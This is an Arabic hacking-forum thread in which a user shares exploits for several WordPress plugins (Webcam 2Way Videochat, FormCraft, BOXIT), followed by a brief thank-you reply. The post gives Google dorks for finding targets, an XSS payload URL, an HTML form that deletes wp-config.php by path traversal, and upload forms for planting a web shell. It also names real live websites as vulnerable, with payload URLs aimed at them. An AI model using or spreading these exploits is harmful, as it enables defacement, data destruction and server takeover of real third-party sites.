1. ViRuS TER0N

    ViRuS TER0N DeveloPer Plus

    الأنتساب:
    ‏28 مارس 2012
    المشاركات:
    115
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    الجزائر
    [​IMG]

    السلام عليكم ورحمة الله وبركاته

    كيف الحال ان شاء الله بخير


    بعض ثغرات الووردبرس من آكتشاف NULL Pointer حبيت اطرحها للفائده

    1 - Wordpress Plugin Webcam 2Way Videochat XSS Vulnerability

    Google Dork :

    كود PHP:
    inurl:"/wp-content/plugins/webcam-2way-videochat/"


    الثغرة في الملف webcam-2way-videochat.php في السطر 609 :

    كود PHP:
    default:echo $_GET['task'] . '&ajax=';


    الإستغلال :

    كود PHP:
    http://127.0.0.1/wp-admin/admin-ajax.php?action=v2wvc&task=/*XSS_HERE*/


    بعض المواقع المصابة :

    http://bogovete.com/wp-admin/admin-ajax.php?action=v2wvc&task=<script>alert(/NULL_Pointer/)</script>
    https://pikaritas.com/wp-admin/admi...c&task=<script>alert(/NULL_Pointer/)</script>
    http://zhangzining.net/wordpress/wp...c&task=<script>alert(/NULL_Pointer/)</script>
    http://www.videochat-scripts.com/wp...c&task=<script>alert(/NULL_Pointer/)</script>

    2 - Wordpress Plugin FormCraft Premium Arbitrary File Deletion Vulnerability

    لحذف أي ملف من السيرفر

    Google Dork :

    كود PHP:
    inurl:"/wp-content/plugins/formcraft/"
    الثغرة في الملف function.php في السطر 512 :

    كود PHP:
        if (isset($_POST['name']))
        {
            
    $file_name get_home_path().'wp-content/plugins/formcraft/file-upload/server/php/files/'.$_POST['name'];
            if (
    is_file($file_name))
            {
                
    unlink($file_name);
                echo 
    "Deleted";
            }
            else
            {
                echo 
    "Not";
            }
        } 
    الإستغلال :

    مثال لحذف ملف الكونفيق wp-config.php

    كود PHP:
    <!--
    By NULL_Pointer
    -->
    <
    form action="http://127.0.0.1/wp-admin/admin-ajax.php?action=formcraft_delete_file" method="POST">
    <
    input name="name" value="../../../../../../../wp-config.php">
    <
    input type="submit" value="Delete It">
    </
    form>
    الثغرة في الملف upload.php

    الإستغلال :

    كود PHP:
    <!--
    By NULL_Pointer
    -->
    <
    form action="http://127.0.0.1/wp-content/plugins/boxit-2/upload.php" method="POST" enctype="multipart/form-data">
    <
    input type="file" name="qqfile">
    <
    input type="submit" value="Upload">
    </
    form>
    لإستعراض الشل، نروح للمسار هذا

    http://127.0.0.1/wp-content/plugins/boxit-2/tmp/

    بعض المواقع المصابة :

    Print Bureau - Digital and Lithographic Printing In Hebden Bridge | Sowerby Bridge | Halifax | West Yorkshire
    Freisteller - gأ¼nstig Bilder freistellen lassen - picperfect,de

    4 - WordPress Plugin BOXIT File Upload Vulnerability

    الثغرة في الملف boxit.php عند الدالة boxit_uploader_process في السطر 549.

    الإستغلال :

    كود PHP:
    <!--
    By NULL_Pointer
    -->
    <
    form action="http://127.0.0.1/wp-admin/admin-ajax.php?action=wpud_uploader_process" method="POST" enctype="multipart/form-data">
    <
    input type="file" name="files">
    <
    input type="submit" value="Upload">
    </
    form>
    http://127.0.0.1/wp-content/plugins/boxit/tmp/

    بعض المواقع المصابة :

    Center for Chemistry Education | Miami University

    وهذه روابط لتحميل الPlugins لمن أراد فحصها أكثر :

    Webcam 2 Way Videochat 4.41
    Webcam 2 Way Videochat 4.41

    FormCraft 2.0.5
    FormCraft 2.0.5

    BOXIT 2.0.2
    BOXIT 2.0.2

    BOXIT
    BOXIT

    بالتوفيق للجميع والسلام عليكم ورحمة الله وبركاته
     
  2. сомαиdα

    сомαиdα Developer

    الأنتساب:
    ‏29 مارس 2012
    المشاركات:
    51
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    in the holy Land
    رد: بعض ثغرات الووردبرس - Wordpress

    وعليكم السلام

    يعطيك العافية

    مجهود رائع
     

مشاركة هذه الصفحة